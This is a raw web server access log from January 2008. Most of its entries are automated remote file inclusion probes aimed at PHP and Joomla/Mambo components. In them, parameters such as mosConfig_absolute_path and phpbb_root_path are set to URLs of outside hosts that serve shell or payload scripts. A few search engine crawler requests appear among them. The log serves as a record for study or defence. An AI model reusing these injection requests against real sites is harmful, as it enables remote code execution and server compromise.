82.94.230.194 - - [25/Jan/2008:10:26:33 -0800] "GET /logs/access_071229.log/components/com_simpleboard/image_upload.php?sbp=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.94.230.194 - - [25/Jan/2008:10:26:33 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:10:27:26 -0800] "GET /logs/access_080106.log/[Scripthttp://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:10:27:27 -0800] "GET /[Scripthttp://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:10:27:27 -0800] "GET /logs/[Scripthttp://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.8.71 - - [25/Jan/2008:10:27:28 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.71 - - [25/Jan/2008:10:27:29 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.228.66.170 - - [25/Jan/2008:10:27:32 -0800] "GET /logs/access_071212.log//modules/My_eGallery/public/displayCategory.php?basepath=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.228.66.170 - - [25/Jan/2008:10:27:33 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.228.66.170 - - [25/Jan/2008:10:27:34 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.198.92 - - [25/Jan/2008:10:28:11 -0800] "GET /logs/access_071230.log//includes/functions_portal.php?phpbb_root_path=http://pucorp.org/id21.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.198.92 - - [25/Jan/2008:10:28:12 -0800] "GET //includes/functions_portal.php?phpbb_root_path=http://pucorp.org/id21.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.198.92 - - [25/Jan/2008:10:28:12 -0800] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://pucorp.org/id21.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:10:28:17 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://killerzone.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.229.7.154 - - [25/Jan/2008:10:30:12 -0800] "GET //index.php?body=http://www.vpt-niedersachsen.de/forum/templates/subSilver/scape.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:10:30:20 -0800] "GET /logs/access_071224.log/components/com_forum/download.php?phpbb_root_path=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:10:30:59 -0800] "GET /logs/access_071225.log/index.php?body=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:10:30:59 -0800] "GET /index.php?body=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:10:30:59 -0800] "GET /logs/index.php?body=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.218.51.165 - - [25/Jan/2008:10:32:20 -0800] "GET /logs/access_071228.log%20%20//skin/zero_vote/error.php?dir=http://aggg.altervista.org/start.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.47.202.20 - - [25/Jan/2008:10:33:29 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.xxxfilmmaking.com/error.txt?http://www.xxxfilmmaking.com/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:10:33:49 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://killerzone.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.193.55 - - [25/Jan/2008:10:34:17 -0800] "GET /logs////////?mosConfig_absolute_path=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt? HTTP/1.1" 200 32348 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
62.75.193.55 - - [25/Jan/2008:10:34:21 -0800] "GET ////////?mosConfig_absolute_path=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt? HTTP/1.1" 200 2968 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:10:35:28 -0800] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:10:35:28 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:10:35:28 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.218.51.165 - - [25/Jan/2008:10:35:48 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://aggg.altervista.org/start.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.44.94 - - [25/Jan/2008:10:36:53 -0800] "GET /logs/access.log HTTP/1.0" 200 305059 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.29.11 - - [25/Jan/2008:10:38:41 -0800] "GET /logs/access_070801.log HTTP/1.0" 200 22773 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:10:38:46 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:10:38:59 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://killerzone.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:10:38:59 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://killerzone.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:10:39:54 -0800] "GET /logs/access_071230.log//tools/send_reminders.php?noSet=0&includedir=http://killerzone.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.218.51.165 - - [25/Jan/2008:10:39:58 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://aggg.altervista.org/start.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.169.155.140 - - [25/Jan/2008:10:40:10 -0800] "GET /logs/access.log/com_phpshop/page,shop.browse/category_id,5eeffc9c1e69a5dc85cae2bbac5e9ad6/option,com_phpshop/Itemid,1/index2.php?page=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.169.155.140 - - [25/Jan/2008:10:40:10 -0800] "GET /com_phpshop/page,shop.browse/category_id,5eeffc9c1e69a5dc85cae2bbac5e9ad6/option,com_phpshop/Itemid,1/index2.php?page=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.169.155.140 - - [25/Jan/2008:10:40:10 -0800] "GET /logs/com_phpshop/page,shop.browse/category_id,5eeffc9c1e69a5dc85cae2bbac5e9ad6/option,com_phpshop/Itemid,1/index2.php?page=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.19.146 - - [25/Jan/2008:10:42:31 -0800] "GET /tmp/sess_68e33558d74d8fcb2b292744d4a38dc7 HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:10:44:45 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://killerzone.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:10:44:45 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://killerzone.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.225.105.144 - - [25/Jan/2008:10:45:15 -0800] "GET /%02%0314S%02%0315c%0314R%0315i%0314P%0315t%0Fhttp://zal.sioru.net/KOMA/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:10:45:59 -0800] "GET /logs/access_071228.log//tools/send_reminders.php?noSet=0&includedir=http://killerzone.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.10.64.90 - - [25/Jan/2008:10:46:20 -0800] "GET /logs/access.log/componentsIII/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.10.64.90 - - [25/Jan/2008:10:46:20 -0800] "GET /componentsIII/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.10.64.90 - - [25/Jan/2008:10:46:24 -0800] "GET /logs/componentsIII/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.98.2 - - [25/Jan/2008:10:48:28 -0800] "GET /logs/access.log/com_phpshop/page,shop.browse/category_id,5eeffc9c1e69a5dc85cae2bbac5e9ad6/option,com_phpshop/Itemid,1/index2.php?page=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.98.2 - - [25/Jan/2008:10:48:28 -0800] "GET /com_phpshop/page,shop.browse/category_id,5eeffc9c1e69a5dc85cae2bbac5e9ad6/option,com_phpshop/Itemid,1/index2.php?page=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.98.2 - - [25/Jan/2008:10:48:28 -0800] "GET /logs/com_phpshop/page,shop.browse/category_id,5eeffc9c1e69a5dc85cae2bbac5e9ad6/option,com_phpshop/Itemid,1/index2.php?page=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.225.105.144 - - [25/Jan/2008:10:48:33 -0800] "GET /tools/send_reminders.php=http://zal.sioru.net/KOMA/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.9.218 - - [25/Jan/2008:10:49:36 -0800] "GET /logs/access.log/com_phpshop/page,shop.browse/category_id,5eeffc9c1e69a5dc85cae2bbac5e9ad6/option,com_phpshop/Itemid,1/index2.php?page=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [25/Jan/2008:10:49:37 -0800] "GET /com_phpshop/page,shop.browse/category_id,5eeffc9c1e69a5dc85cae2bbac5e9ad6/option,com_phpshop/Itemid,1/index2.php?page=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [25/Jan/2008:10:49:41 -0800] "GET /logs/com_phpshop/page,shop.browse/category_id,5eeffc9c1e69a5dc85cae2bbac5e9ad6/option,com_phpshop/Itemid,1/index2.php?page=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.171.105.130 - - [25/Jan/2008:10:50:28 -0800] "GET /logs/access.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_pathhttp://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.171.105.130 - - [25/Jan/2008:10:50:29 -0800] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_pathhttp://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.171.105.130 - - [25/Jan/2008:10:50:29 -0800] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_pathhttp://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.218.51.165 - - [25/Jan/2008:10:53:01 -0800] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://aggg.altervista.org/start.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.77.94.81 - - [25/Jan/2008:10:54:34 -0800] "GET /logs/access_071225.log/include.php?path=psp/user.php&site=http://lorder.sitesled.com/idasc???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.77.94.81 - - [25/Jan/2008:10:54:35 -0800] "GET /include.php?path=psp/user.php&site=http://lorder.sitesled.com/idasc???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.77.94.81 - - [25/Jan/2008:10:54:35 -0800] "GET /logs/include.php?path=psp/user.php&site=http://lorder.sitesled.com/idasc???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.10.64.90 - - [25/Jan/2008:10:55:09 -0800] "GET /logs/access_080106.log/componentsIII/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.19.90 - - [25/Jan/2008:10:55:44 -0800] "GET /logs/access.log/////////////////////?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.29.37 - - [25/Jan/2008:10:56:07 -0800] "GET /presto/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [25/Jan/2008:10:56:26 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [25/Jan/2008:10:56:27 -0800] "GET /funny/?M=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.55.213.31 - - [25/Jan/2008:10:57:12 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [25/Jan/2008:10:57:17 -0800] "GET /bikes/IMG_1192.jpg HTTP/1.0" 200 3904179 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
61.218.51.165 - - [25/Jan/2008:10:58:08 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://aggg.altervista.org/start.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.15.252.72 - - [25/Jan/2008:10:58:34 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://stokt.com//mojok/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.171.102.74 - - [25/Jan/2008:10:59:00 -0800] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://adrianuzzo1985.altervista.org/cartella/cmdx9.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.53.225.40 - - [25/Jan/2008:10:59:06 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.120.241.242 - - [25/Jan/2008:10:59:16 -0800] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.120.241.242 - - [25/Jan/2008:10:59:16 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.120.241.242 - - [25/Jan/2008:10:59:16 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:10:59:25 -0800] "GET /logs/access_080106.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:10:59:26 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:10:59:26 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:10:59:27 -0800] "GET /logs/access_071230.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.15.252.72 - - [25/Jan/2008:11:01:09 -0800] "GET /logs/access_071225.log//templates/mangobery/footer.sample.php?Site_Path=http://stokt.com//mojok/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.15.252.72 - - [25/Jan/2008:11:01:09 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://stokt.com//mojok/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.15.252.72 - - [25/Jan/2008:11:01:09 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://stokt.com//mojok/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:11:01:36 -0800] "GET /tools/send.reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/dd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:11:01:36 -0800] "GET /tools/send.reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:11:01:39 -0800] "GET /logs/tools/send.reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/dd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:11:01:39 -0800] "GET /logs/tools/send.reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:11:01:45 -0800] "GET /logs/access_071222.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:11:01:45 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:11:01:45 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:11:01:51 -0800] "GET /logs/access.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:11:01:51 -0800] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:11:01:51 -0800] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.15.252.72 - - [25/Jan/2008:11:02:01 -0800] "GET /logs/access.log//templates/mangobery/footer.sample.php?Site_Path=http://stokt.com//mojok/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:11:02:31 -0800] "GET /tools/send.reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/dd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:11:02:32 -0800] "GET /tools/send.reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:11:02:39 -0800] "GET /logs/tools/send.reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/dd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:11:02:39 -0800] "GET /logs/tools/send.reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
216.120.241.242 - - [25/Jan/2008:11:02:49 -0800] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.120.241.242 - - [25/Jan/2008:11:02:49 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.120.241.242 - - [25/Jan/2008:11:02:50 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.46.178 - - [25/Jan/2008:11:03:08 -0800] "GET /logs/access.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.46.178 - - [25/Jan/2008:11:03:09 -0800] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.46.178 - - [25/Jan/2008:11:03:09 -0800] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.225.105.144 - - [25/Jan/2008:11:03:37 -0800] "GET /logs/access_080106.log/%02%0314S%02%0315c%0314R%0315i%0314P%0315t%0Fhttp://zal.sioru.net/KOMA/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.225.105.144 - - [25/Jan/2008:11:03:38 -0800] "GET /logs/%02%0314S%02%0315c%0314R%0315i%0314P%0315t%0Fhttp://zal.sioru.net/KOMA/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:11:03:42 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:11:03:43 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [25/Jan/2008:11:03:44 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:11:05:21 -0800] "GET /logs/access_071225.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:11:05:21 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:11:05:22 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:11:05:41 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:11:05:42 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:11:05:42 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:11:06:03 -0800] "GET /logs/access_071225.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.23.123 - - [25/Jan/2008:11:06:10 -0800] "GET /logs/access_071016.log HTTP/1.0" 200 46965 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
